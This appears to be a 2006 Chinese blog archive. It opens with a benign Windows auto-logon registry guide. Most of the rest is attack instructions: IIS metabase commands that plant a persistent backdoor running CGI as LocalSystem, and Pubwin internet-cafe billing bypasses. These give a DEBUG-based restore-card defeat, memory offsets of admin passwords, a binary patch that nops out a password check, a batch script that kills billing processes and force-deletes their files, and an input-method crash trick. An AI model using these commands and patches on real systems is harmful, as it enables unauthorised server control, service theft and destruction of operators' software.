2006年03月24日

###HOST:220.192.164.204:80@@@

如何在 Windows XP 中启用自动登录

概要

本文介绍如何通过在注册表数据库中存储密码和其他相关信息,将 Windows 配置为自动执行登录过程。此功能允许其他用户启动您的计算机以及使用您建立的帐户自动登录。

重要说明:如果启用自动登录,Windows XP 使用起来会更加方便。但是,使用此功能会带来安全隐患。

更多信息

警告:注册表编辑器使用不当可导致严重问题,可能需要重新安装操作系统。Microsoft 不能保证您可以解决因注册表编辑器使用不当而导致的问题。使用注册表编辑器需要您自担风险。

如果将计算机设置为自动登录,则可以实际访问此计算机的任何用户还可以访问此计算机(包括与此计算机相连的所有网络)上的所有内容。另外,如果启用自动登录,密码将以纯文本格式存储在注册表中。Authenticated Users 组可以远程读取存储此值的特定注册表项。因此,只有在计算机的安全性确实可靠,并且确保不可信用户无法远程访问注册表的情况下,才适合使用这种设置。

使用注册表编辑器 (Regedit.exe) 添加登录信息:
  1. 单击开始,单击运行,键入 regedit,然后单击确定启动注册表编辑器。
  2. 找到下面的注册表项:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

  3. 在使用您的帐户名和密码和情况下,双击 DefaultUserName 条目,键入您的用户名,然后单击确定
  4. 双击 DefaultPassword 条目,在数值数据框下键入您的密码,然后单击确定

    如果没有 DefaultPassword 数值,请按照下面这些步骤创建此数值:
    1. 注册表编辑器菜单上,依次单击编辑新建字符串值
    2. 键入 DefaultPassword 作为数值名称,然后按 Enter 键。
    3. 双击新创建的项,然后在数值数据框中键入密码。

    如果未指定 DefaultPassword 字符串,Windows 会自动将 AutoAdminLogon 项的数值从 1 (True) 更改为 0 (False),以禁用 AutoAdminLogon 功能。

  5. 双击 AutoAdminLogon 条目,在数值数据框中键入 1,然后单击确定

    如果没有 AutoAdminLogon 条目,请按照下面这些步骤创建此条目:
    1. 注册表编辑器菜单上,依次单击编辑新建字符串值
    2. 键入 AutoAdminLogon 作为数值名称,然后按 Enter 键。
    3. 双击新创建的项,然后在数值数据框中键入 1
  6. 退出注册表编辑器。
  7. 单击开始,单击重新启动,然后单击确定
  8. 当计算机重新启动并且 Windows 启动后,便可以自动登录。
若要绕过自动登录过程并以其他用户的身份登录,请在注销后或在 Windows 重新启动后按住 Shift 键。请注意,此过程只适用于首次登录。要对以后的注销强制使用此设置,管理员必须设置以下注册表项:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

数值:
ForceAutoLogon
类型:REG_SZ
数据: 1

在 Windows XP Home Edition 和 Windows XP Professional(未加入域)中,也可以通过下列步骤启用自动登录,无需编辑注册表:
  1. 单击开始,然后单击运行
  2. 打开框中,键入 control userpasswords2,然后单击确定
  3. 在出现的对话框中,清除“要使用本机,用户必须输入用户名和密码”复选框,然后单击确定

这篇文章中的信息适用于:

  • Microsoft Windows XP Home Edition
  • Microsoft Windows XP Professional
  • Microsoft Windows XP 64-Bit Edition

2. 在默认情况下,在启动时可以按住Shift键来阻止自动登录。要消除Shift键对自动登录的影响,可以添加一个名为IgnoreShiftOverride的字符串值,并将该值设为1;


3. 还可限制自动登录能够进行的次数,使其达到这个次数后,自动关闭这个功能。如此需要添加一个名为AutoLogonCount的DWORD值,将其设为希望使用自动登录的次数。这样,计算机每次启动并执行自动登录时,AutoLogonCount的值就会减1。减到0时,Windows就会将AutoAdminLogon的值改为0(关闭自动登录)并删除AutoLogonCount值。

对账户名的隐藏


    在本刊2005年第5期的“系统安全从账号设置做起”一文中,作者曾经提出:通过“用户账号”中的“更改用户登录和注销的方式”任务设置,取消“使用欢迎屏幕”选项来进行用户登录。不过这样每次登录的时候都要输入用户名和密码,有时觉得比较麻烦。其实完全可以保留使用欢迎屏幕——只要隐藏某些用户账户就行了(本文针对Windows 2000/XP系统)。具体可以通过修改注册表实现:


1. 在“开始”菜单的“运行”处运行“regedit”命令,进入注册表编辑器;


2. 打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, 创建一个新的DWORD值,将这个值的名称设为要隐藏的账户名,并将值设为0。


  如此,你隐藏的账户(如管理员账户)就不会出现在欢迎屏幕上。而要登录到欢迎屏幕上没有的账户,可以按两次Ctrl+Alt+Delete显示出“登录到Windows”对话框,输入用户名和密码即可。不过,以这种方式隐藏的账户是不能使用快速用户切换功能的,因为按两次Ctrl+Alt+Delete的技巧只能在没有其他人登录进计算机时方能奏效。


  作者在寝室就是把自己的管理员账户隐藏了起来,只在欢迎屏幕上留了个公用账户,同学要进系统只需输入密码即可。如此既方便了同学,又阻止了好事者对我管理员密码的追问。

WIN 2000系统

打开控制面板–用户和密码:把要使用本机,用户必须输入用户名和密码前面的复选框去掉,然后点击确定,系统提示必须有一个自动登陆的用户与密码。这时候输入自动登陆的用户名和密码,点击确定即可。对于Windows2000和NT操作系统,如果想自动登陆的话,此法通用:
打开开始菜单–运行,regedit,找到winlogon主键,在右边窗口新键字符串值:
autoadminlogon:键值为1
defaultusername:键值为自动登陆的用户名
defaultpassword:键值为自动登陆用户的密码
defaultdomainname:键值为自动登陆的计算机名称或者登陆网络的域名。
重新启动计算机,一切ok

WIN XP

  单击“开始/运行”,输入“rundll32 netplwiz.dll,UsersRunDll”,按回车键后弹出“用户帐户”窗口,看清楚,这可跟“控制面板”中打开的“用户账户”面板窗口不同哦!然后取消选定“要使用本机,用户必须输入用户名和密码”选项,单击确定,在弹出的对话框中输入你想让电脑每次自动登录的账户和密码即可。

WIN2003

如何才能让Windows 2003实现自动登录及普通关机呢?在此以Windows 2003 Server Enterprise Edition(企业版)为例,通过以下方法可以实现:
  一、登录的设置
  1、输入命令行
  打开“开始”→“运行”,在“运行”一栏中输入“Rundll32 netplwiz.dll,UsersRunDll”或者“control userpasswords2”命令打开用户帐户窗口(注意区分大小写),去除“要使用本机,用户必须输入用户名密码”复选框中的勾号。

  这样在下次登录时就可自动登录了。若要选择不同的帐户,只要在启动时按“Shift”键就可以了。

实现NT Workstation的自动登陆。具体方法如下:

  一、运行REGEDT32,打开注册表编辑器;

  二、选中"HKEY_LOCAL_MACHINE"页,此页保存着本机系统中的重要信息,如硬件驱动,系统配置等。

  三、依次展开SOFTWARE / Microsoft / Windows NT / Current Version / Winlogon,所有关于Windows NT的登陆信息都在这里了。

  四、选择"编辑"菜单中的"添加数值",在数值名称中输入"AutoAdminLogon",数据类型为"REG_SZ",按"确定"后在弹出的"字符串编辑器"中输入"1",表示允许自动登陆(字符串为"0"时表示禁止自动登陆)。 

  五、按以上做法,添加一个名为"Defaultpassword"的数值,并在"字符串"文本框中输入相应的用户密码。

  六、打开"DefaultDomainName"及"DefaultUserName",分别输入自动登陆的"域"及"用户名"。

  七、保存并退出注册表编辑器。

  现在可以重新启动试试,登陆窗口是不是一闪而过?经过以上修改,笔者单位的六台查询终端全部实现了自动登陆,每天上班后只需接通电源即可,省下了不少麻烦。高兴之余,还有几个问题需要提醒大家注意一下:

  1.本方法同样适用于NT Server。

  2.使用自动登陆后,登陆密码将不再安全,别人可以轻易在"DefaultPassword"中将你的用户名和密码一览无遗。

  3.如果想临时以其他用户身份登陆,可以在显示登陆对话框之前按"Shift"键强制登陆;想取消自动登陆,可以将"AutoAdminLogon"的值改为"0"。

  4.登陆密码不能为空,否则修改后第一次可自动登陆,之后"AutoAdminLogon"的值会自动改为"0"。当初笔者就是为了贪方便,将登陆密码全部改为空,结果在实现自动登陆的问题上走了不少弯路

   4、也可以使用其他的自动登陆工具来实现windows系统的自动登陆
     如NTAutoLogon等,可以到网上去找!

2006年03月23日

永远的后门
 
 

 
 
永远的后门
IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。

如果你对此有情趣,跟我来………..
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false


注释:cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path


这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧) , 大家不可以用来做非法的攻击,一切后果自负
 
 

轻松搞定网吧--新的网吧记费管理系统—punwin


美萍和万象已经是过去了,现在有出现一些新的网吧记费管理系统—punwin,呵呵,在网上搜一下关于破解pubwin的方法,怎么样?是不是少之又少?我们这边新开了一家网吧,刚好记费管理系统就是pubwin,也是我们这边唯一的一个安装pubwin的网吧,对于喜欢玩新事物的我当然要玩玩啦~~!相信你们那边也一定安了吧?好了 废话少说,下面让我介绍一下如何对付pubwin的方法吧!虽然没有抓图,不过我会尽量说的详细些,保证你能看懂。

虽然我我经常突破网吧的限制,但是,这个网吧的网管也不是吃素的,为了便于保护,他早就把全部都设为虚拟桌面了,机子的操作系统也是windowsXP的,看看能不能进入cmd,我找了半天也没有找到“开始”。试着进入它的C盘看看,打开IE浏览器,在地址栏里输入c:\,晕,连C盘都禁止了,不用说了,其他的文件一定也禁止了,下载一个软件试试,哈哈,没有禁止下载,下载前先看看有没有还原精灵,我左找右找还是没找到,这回可以放心下载了,(注意:下载到桌面,然后会出现一个下载进程的窗口,这是要找到“下载完毕后关闭该对话框”看看它前的方框里面有没有小钩,如果有就把它去掉)下载完毕后不要去点击“关闭”,要点击“打开”,(玩着玩着就死机了,只好重启机,后来才知道,原来有还原精灵)在重启是看到一个桌面,后来有试了一下,原来是真实桌面。好了,以上是网吧的具体情况,下面说一说具体的对策吧!首先是卸载pubwin,卸载前定一个大概的思路吧:

1.先破解还原卡

2.进入注册表

3.利用真实桌面

4.结束卸载

5.结束突破,免费上网

首先去网吧的收费台定时,15分钟足矣!开始行动,首先我们来破解它的还原卡,让我来给大家介绍一下吧,

开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了 还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置。一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索关键词"还原卡"就行了,找到你用的那个牌子的还原卡,一般可以找到默认密码的.台湾远志牌的还原卡的默认密码是12345678, 小哨兵的是manager, 而管理员已经把密码改了,所以只好自己破解了。具体过程如下:

开机过程按住F8键,进入纯dos环境, 注";"后为注释.

出现提示符c:,

键入c:\debug,

- a100

- xor ax,ax

- int 13

- int3

; 寻找原始的int 13入口. 然后输入t回车,不断的重复,直到显示的地址形如 F001:xxxx ,后面的指令为:mov dl,80 (练练眼力-。按q退出. 记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。

例如,我的得到的地址是F001:9A96

再次运行debug ,键入:

-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.

-q

破解完成。设为不还原就可以了,打开浏览器,点击上面的“查看—>源文件”,把里面的代码全部删除,输入如下内容:

REGEDIT4

 

[HKEY_CURRENT_USER、Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistry Tools"=dword:00000000

以上是解除“禁止使用注册表编辑”。接下来就是解除其它所有禁止的功能,好了把C盘设为可访问吧(在网上有一系列的关于注册表解锁的代码,这里笔者就不一一叙述了)。好了,时间也差不多了,开始卸载pubwin客户端吧。重启机,刚刚出现桌面时点击开始把鼠标移到“所有程序”上(速度要快,否则很快就会变成虚拟桌面)好了下面点击子菜单里的“Hintsoft"会出现一个子菜单,点击子菜单中的”网吧管理客户端“还会出现一个子菜单这时点击“卸载”,然后一路点击“是”就可以卸载了,重启机生效。卸载完了。这时就自由了。

卸载pubwin的方法就介绍完了,你可以免费上网了。

下面介绍一下破解pubwin密码的方法吧,首先下载winhex,然后打开RemEditor,找到pubwin#(*****)(注意:*****是数字,例如:429856784)双击pubwin,在下面的列表中选中PrimaryMemory,然后查找:004300D0,好了,后面就有管理员密码了,密码也破解完了做你自己想做的事吧!

你还可以通过在地址栏里输入ftp://ip然后登陆失败,你就可以看到网上邻居和其他的东西,如果有写权限你还可以搞搞破坏,呵呵!好了,全部都介绍完了!有问题可以与我联系QQ87330927

先公布一下破解方法的环境:windows2000和还原精灵 注意此方法只适用与2k啊
开机后什么也不用干,等着进入2000就好了,在出现加载个人设置界面时就要作好准备了,在出现系统桌面的那一瞬间,迅速双击我的电脑,等一会,PUBWIN4就会控制了桌面,但看看PUBWIN4登陆界面的后面。我的电脑出来了,嘿嘿。
但是不要以为这样就破解了啊。这样是逃不过PUBWIN4的3分钟刷新的,
然后进入C:\PROGRAM FILES\HINTSOFT\PUBCLT\
好 找到两个文件PUBWIN.EXE RECLOCK.EXE 并把他们改名
然后注销 千万是注销啊 可别重起啊 大哥 要不你前面的一切就烟消云散了
至此 敬礼 嘿嘿 结束

Pubwin4免费全攻略

(2004-09-12 11:56)
来源:《黑客X档案》
Pubwin4,航母级的网吧管理软件,上海市场占有率90%,中原省会郑州市场占有率100%(强制使用),在全国任何一个有网吧的地方都可以看到它的身影。网吧老板对Pubwin4的安全与便捷有佳,这可苦了我们这些劳苦大众,以前用方竹/美萍时还可以上会儿免费网,可Pubwin4还真有点作难。

Pubwin4有三个线程分别是pubwin.exe UDP ???

  Pubwin,exe UDP ???

  Reclock.exe TCP ??? (如图20040307132207_1376725)


Pubwin4每3分钟一刷新,UDP连接协议。即使你使用一些快捷键进入了系统,也躲不过系统的3分钟刷新,与Pubwin4的“八年抗战”就此开始。

首先,你看到的是Pubwin4的登陆界面(如图20040307131805_1376783)


我们的突破口已经出现,①用户登录-要么你刷卡/敲进帐号密码,要么你让pubwin4不用帐号就登进去,这可能吗?②系统管理-要管理员密码的,网管是你女朋友,那太好了,可我没这么好运气;③利用pubwin4自身的系统漏洞,比如有什么热键没被屏蔽(ctrl+alt+del等)

这三个突破口中管理员密码是最诱人的,做网管还不是想怎么样就。。。

一.管理员密码篇

记得去年有一期《X》上一位仁兄介绍了使用winhex得到管理员密码的方法,当时给出了密码在内存中的地址,可pubwin4每升级或打一次补丁它的地址就变一次,那地址可是成千上万条,难不成我还一个一个找,胡子都白了。(没看过这篇文章的望下看也可明白)

授之于鱼不如授之于渔!

pubwin4打了补丁那我们就也“打补丁”吧!

首先,找一台没有装pubwin4的机子,装上pubwin4,打上你想破解的那个网吧版本补丁。

开始默认管理员密码为空,我们可以改为“icelark”

然后,打开winhex-菜单栏工具-Ram编辑器-选择pubwin-双击主要内存(如图20040307132207_1376720)


然后再查找“icelark”/“lark”,你就可以看到管理员密码所在的那一行了。(如图20040307131805_1380497)


即在当前版本下管理员密码出现的地址为“0043CD20”

以下是我一年多来收集的pubwin4管理员密码出现的地址

pubwin4.2.x.x 004300D0/0043CD20

pubwin4.3.0.x 006A4660/00654650

我现在见到的pubwin最高版本是 pubwin4.3.0.7

如果以后有变更,我会及时发在论坛上的。

由于我从不对别人保密,以至于我的同学经常用管理员密码登陆,时间长了,网吧老板也怀疑网吧为什么有那么多机子处于管理员状态。有好几次都。。。

看来什么方法有有利有弊。

下面我要介绍的方法可是我的看家本领,同吃五湖四海,各大网吧,各大计费系统。

二.Pubwin拦截篇

记得网上曾流传一种方法,也可实现近似免费上网的目的,既先用帐号登陆,再用网络剪刀手切落本机与外界的联系,然后换机结帐。这种方法在pubwin早期版本或其他计费系统中还可以,大不了只玩单机游戏,但在pubwin4.3.0.0以上版本中,系统的多线程和3分钟刷新就突显其威力,

还没玩一会儿,pubwin就把你从游戏中退出。

那有没有即牢牢控制住系统,又不切断网络的方法呢?

当然有,上面曾提到pubwin有3个线程分别对应3个端口,我们可以一方面封锁其端口,一方面禁止其运行。

明白了吧!不明白?!

用防火墙,网上的众多防火墙软件中,经过我大量实验,发现ZoneAlarm V3.7.202的稳定性和使用便捷性是最好的。ZoneAlarm可在系统中任一程序对外连接时先行拦截,也可在外界对本机发出某些指令(如pubwin关机/截图等指令)时先行拦截,如图20040307132207_1376726即为服务端发出的关机指令被拦截时,防火墙的反应。
如图20040307131805_1378351既为本机的pubwin.exe在3分钟的刷新中欲与服务端联系时,防火墙的反应(遇到上面/下面的情况,可在复选框内打勾,点“OK”)


下面我们来具体操作。

首先,用帐号登陆系统,下载并安装ZoneAlarm V3.7.202建议选择如图20040307132207_1376722配置
除了ZoneAlarm,木马克星的效果也可以。如果你使用其他防火墙,当出现以下提示框时,说明这个防火墙还不适用,因为点了确定,pubwin就又要你登陆了。

如图20040307131439_1393438
建议使用此方法时不用管理员密码登陆,毕竟一块(五毛)并不多,好歹我们也出点电费呀:)

三.本地密码破解篇

本来我写到上面也就差不多了,可看了04年第2期真实朋友写的文章《本地密码的密码问题》,我感觉他介绍的方法也对pubwin适用,其实也就是管理员密码的另类破解,下面我介绍一下。

将Pubwin.exe 拷入一备分目录,打开W32Dasm,点击“反汇编”,选择备分目录中的Pubwin.exe ,等反编译结束后,点击“参考”选“字符串数据参考”找到“口令错误,请重新输入” 如图20040307131139_1398225,


双击后向上翻页来到:如图20040307130947_1398226


  其中,“85c0testeax , eax7509jne0040f1a5 ”为密码验证语句,若密码不对则跳转,我们只须将 7509 改为 9090 即可,因为 9090 代表执行两次 NOP ,即什么都不做,密码不对也就不跳转了。

将W32Dasm关闭,运行Ultraedit32,打开Pubwin.exe ,查找“85C07509”将其替换为“85C09090”再查找下一个,再改为“85C09090”如图20040307130947_1398228然后将其保存为 “Pubwin.exe”和“pubwin.pub”即可。


但是pubwin是在后台运行,又是多线程保护,要先终止再替换很麻烦。那就用Ultraedit32打开pubwin.exe,点击菜单中的“查找”—“替换”,在“查找内容”中填上“pubwin”,“替换为”中填上4个中文字或8个英文字母,不然会出错,替换完后保存即可。

然后再用管理员密码登陆时,就随便填几个字母,就登入系统了,如图20040307132207_1376769
至于做象《本地软件的密码问题》作者那样的运行即可跳过管理员密码的软件制作,大家就依葫芦画瓢参照制作,这里我就不做赘述。

四.旁门左道篇

“条条大路通罗马”方法是不止一种的,pubwin在我们那里一年多来,朋友们也总结除了其他的一些方法,尽管有些方法可能成功率不高或不适用于你那里的版本,但本着学习的态度我们还是了解一下。

① 智能ABC漏洞 在用户登录的帐号框内切换到智能ABC输入法,输入“V”的时候按一下向上,再按一下“DELETE”键,再按一下空格就可以关闭pubwin了。或随便输入一个字母,按一下向上键,再按一下“DELETE”键,然后在按一下空格, 按几下“删除键”,也可以达到同样效果。如图20040307130947_1400584


这种情况下,需注意不要点确定,直接拉下提示框,鼠标是点不动桌面上的图标的,需要你用热键(开始键)启动程序。如果你的热键也被屏蔽了,那只有说“下次吧!”

② 在刚进入windows界面,pubwin还没有启动时,狂按“Shift+Ctrl+开始”,如果pubwin没有出现出错的提示框,如图20040307131139_1393439


你就再多按“Caps Lock,Alt,Tab,空格”。总之,一句话,狂拍键盘左下脚,如果你幸运且又没被网管听到的话,记住,不要点确定,直接拉下提示框,慢慢玩吧!

③ 狂按“Ctrl+Alt+Del”如果没有见到pubwin出错,再反复“注销”几次,如果你真的命好,就会出现如例②中出现的画面。

五.总 结

无论你采用何种方法,或方法的组合,都要记住适可而止,且都是本着学习的态度和省钱的精神,切莫没看清网管在哪里就下手了。

[注:吾一好友就曾在网管在其身后时,公然输入管理员密码,然后被¥#¥#%☆##$@@#]

网吧的几种武器

综观各个网吧门派,为了限制其他门派纷纷使用各派的镇派之宝,如航母级的PIBWIN,神兵利器万象网管,宝物美萍网管大师,记费王,本文针对此4件宝物给予破解方法。

1.长生剑—-键盘的SLEEP键和WAKE UP键`
出自:WINXP SP2
表演测试:WINXP SP2
  当你在网吧上网的时候,当到时间后,机器都会被锁定,这个时候你可以按SLEEP键,(不要说,你
不知道是那个健啊),然后你会发现显示器会逐渐的转化为待机状态,再按WAKE UP 键,你仔细的盯着显示器,会看到屏幕慢慢清晰,计费系统就会消失掉了,锁定就被解除了,接下来不用我明说了吧,都知道怎么去做,那就是只要不被网管发现,想上多久,就上多久.
高人点评:计费系统可以限制用户的待机,注销权限,是通过屏蔽相关选项按纽的方法来实现的,但很多键盘可以通过按键设置直接调用系统的待机或休眠命令,饶开计费系统本身的限制,由于待机命令和计费系统有冲突,一旦进入了待机状态,计费系统也自然就失败了。

2.霸王枪—U盘
出自:WIN98系统
表演测试:WIN98系统
很多时候我们需要用U盘存储东西,插入U盘后,系统提示要安装相应的驱动程序,选择手动安装方式,通过查找驱动位置的浏览窗口,调用EXPLORER.EXE 进程,桌面就显示出来,这个时候计费系统就型同虚设了,另外现在手机功能越来越多,小菜我那天 拍了自己的照片拿去传到网上,系统是 2000系统,桌面安装的是逍遥游记费软件,杀毒软件安装的是瑞星,当我把数据线插入机器后,瑞星大叔马上很勤快的提示,发现可疑进程,提示的是发现了逍遥游进程,问我是不是查杀,我毫不客气的选择查杀,结果吗?是需要重新启动才可以发挥作用,而机器是还原精灵,我当时比较忙,就没有去破,但我想这个思路是可行的,那位大哥有条件的测试下吧。

高人点评:WIN98没有内置的 USB设备的驱动程序,因此才可以轻松的破解,至于为什么2000里,为什么瑞星会查杀,就有待研究了。

4 .拳头—干掉进程
BE.EXE (NORTON UTILITIES 8。0Z中一个文件,可以产生一个系统延时)
表演测试:
将计费系统的相关进程杀掉是最常用的手段,也是很好使的手段,无论是本地还是远程,这个都十分必要。
步骤一:找出计费系统的相关进程,用合法的帐户登陆计费系统,打开DOS窗口,输入TASKLIST 察看当前进程。分析得知,PUBWIN.EXE为计费进程,RUN。EXE为监视进程,RECLOCK.EXE为截面锁定和权限限制
进程,尝试用TSKILL命令终止其中任一进程,发现均提示找不到该进程,看来只好请NTSL出山了。

步骤二:编写批处理文件
在计费系统中,一旦客户用账号登陆上机,服务端就会将该账号转为计费状态,即使客户
重起或终止计费进程,只要客户不执行下机命令,在服务端该账号就始终处在计费状态,因此要在下机后再执行相关命令,就要编写个批处理文件在后台运行,为了争取下机所需要的时间,要用到BE。EXE将他防到要创建的批处理文件同一目录,打开记事,输入一下内容 (//中为标注,不必输入)
BE delay  300 /让系统延时30秒,30秒后继续执行下面的内容/
ntsd -c q -p PID1/ 利用NTSD 杀计费系统进程,PID1 为进程 RUND1L。EXE的ID /
ntsd -c q -p PID2/PID2为进程RECLOCK。EXE的ID /
ntsd -c q -p PID3/PID3为进程RECLOCK。EXE的ID /
cd C:\PROGRAM FILES\HINTSOFT\PUBCLT\进入pubwin运行文件目录,此处以Pubwin的默认安装目录为例/
del/f/s/q*.*/删除与计费系统相关的全部运行文件/
del C:\WINDOWS\system32\RUND1L.exe保存该文件并命名c.bat
步骤三:
运行C.bat,账号注销下机,静静的等待30秒,计费系统被无情的杀掉了,虽然任务拦无法显示,
但并不影响使用。

6.多情环 —输入法漏洞
把输入法选中为智能ABC状态,这个时候在在网吧管理软件登陆口,你可以输入文字的地方,把光标移向那个地方,首先输入v,向上按下左箭头(移动任何一个方向键都可以) ,再按删除键 ,回车,后退键(有时要按二次后退键),然后立刻造成当前任何窗口进程死掉。关掉,重新来,就不记费了。一般系统只要这个BUG不被管理员处理掉,很多都是可以破的,不管是什么网吧管理软件,因为这是智能ABC输入法的BUG。

这里我做了下深化。用OD打开笔记本。然后切换输入法到智能ABC,输入v,左箭头,delete ,回车
(空格也可以)。然后立刻造成进程死掉,然后OD的信息会告诉你问题出在7380****.而7380****属
于winabc.ime的地址。经过跟踪,确定出错指令为ImeToAsciiEx函数。开始不知此函数是干中的,于是
查了一下,此函数是用来处理输入的字符。每按一个键就会调用一次,当上面这个动作做完后又调用了
 0×7380AC95函数。

OD显法的内容如下:

7380ACA1 |> 66:81FE 3D80   CMP SI,803D               ;si为你按的那个键的hex值
7380ACA6 |. 75 26       JNZ SHORT WINABC.7380ACCE    
7380ACA8 |. 803D B0298173 >CMP BYTE PTR DS:[738129B0],3   ;3为输入中间阶段
7380ACAF |. 0F84 E7010000 JE WINABC.7380AE9C
7380ACB5 |. 833D AC298173 >CMP DWORD PTR DS:[738129AC],1
7380ACBC |. 0F8E DA010000 JLE WINABC.7380AE9C
7380ACC2 |. C605 B0298173 >MOV BYTE PTR DS:[738129B0],1
7380ACC9 |. E9 CE010000   JMP WINABC.7380AE9C

关于0×7380AC95的代码

7380ADB4 |> 56         PUSH ESI
7380ADB5 |. E8 58140000   CALL WINABC.7380C212
7380ADBA |. 85C0       TEST EAX,EAX
7380ADBC |. 74 20       JE SHORT WINABC.7380ADDE
7380ADBE |. 66:83FE 76   CMP SI,76                 ; 与’v'比较
7380ADC2 |. C605 B0298173 >MOV BYTE PTR DS:[738129B0],3
7380ADC9 |. 0F94C0       SETE AL                 ; 不是的话al=0
7380ADCC |. A2 6C488173   MOV BYTE PTR DS:[7381486C],AL   ; 是v的话进入v输入状态
7380ADD1 |. E8 F6110000   CALL WINABC.7380BFCC        
7380ADD6 |. 391D CC558173 CMP DWORD PTR DS:[738155CC],EBX
7380ADDC |. EB 23       JMP SHORT WINABC.7380AE01

v的输入状态不同,比如Vabc 会输入abc英文,V1什么的为特殊字符和符号。
下面去找出问题的地方
